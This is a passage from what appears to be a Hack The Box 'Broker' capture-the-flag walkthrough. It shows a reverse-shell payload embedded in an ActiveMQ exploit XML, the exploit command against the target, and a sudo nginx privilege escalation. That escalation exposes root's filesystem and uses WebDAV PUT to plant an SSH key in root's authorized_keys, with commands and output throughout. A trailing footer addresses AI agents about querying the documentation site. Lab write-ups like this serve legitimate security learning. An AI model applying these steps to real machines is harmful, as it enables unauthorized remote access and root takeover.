* change `poc-linux.xml` file
* Contents of my file
```markup
bash
-c
sh -i >& /dev/tcp//9999 0>&1
```
* Start a python server with `python -m http.server 8001`
* run the program
```bash
go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.10:8001/poc-linux.xml
```
## Exploitation (Root)
* sudo -l
```bash
activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
```
* So we have root permissions on nginx,
* i.e we can create a webserver on the box with root privileges.
* Refer to the following docs to crate a webserver
{% embed url="" %}
```
activemq@broker:/tmp$ cat heap.conf
user root;
worker_processes auto;
pid /run/nginx6767.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
server{
listen 7878;
location /{
root /;
autoindex on;
}
}
}
```
* And start the nginx server with following cmd
```bash
sudo nginx -c /tmp/heap.conf
```
```bash
activemq@broker:/tmp$ curl localhost:7878/root/
Index of /root/
Index of /root/
../
cleanup.sh 07-Nov-2023 08:15 517
root.txt 10-Nov-2023 06:11 33
activemq@broker:/tmp$
```
* We can read the files (root.txt)
### Beyond root (ippsec way)
* If we can create our own server, let's create one where we can put files
{% embed url="" %}
The above link specify us about the `dav_methods`
```javascript
location / {
root /;
dav_methods PUT;
}
```
* Let's put our public key in `/root/.ssh/authorized_keys`
* Command :
```bash
curl -X PUT http://10.10.11.243:7457/root/.ssh/authorized_keys \
--upload-file ~/.ssh/id_rsa.pub
```
***replace the port(7457) with the port number you used to create the nginx server***
### Shell
* Let's check if our key is been placed
```bash
activemq@broker:/tmp$ curl localhost:7878/root/.ssh/
Index of /root/.ssh/
Index of /root/.ssh/
../
authorized_keys 10-Nov-2023 10:36 741
activemq@broker:/tmp$
```
* As we can see our keys are placed, now just ssh & we have rooooooooot shell
```bash
└─➜ ssh root@10.10.11.243 [0]
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
<-- snipped -->
Last login: Fri Nov 10 10:40:14 2023 from 10.10.14.51
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
root@broker:~#
```
## PWNED
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_heapbytes's still pwning.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://heapbytes.gitbook.io/notes/rooms/hackthebox/easy/broker.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.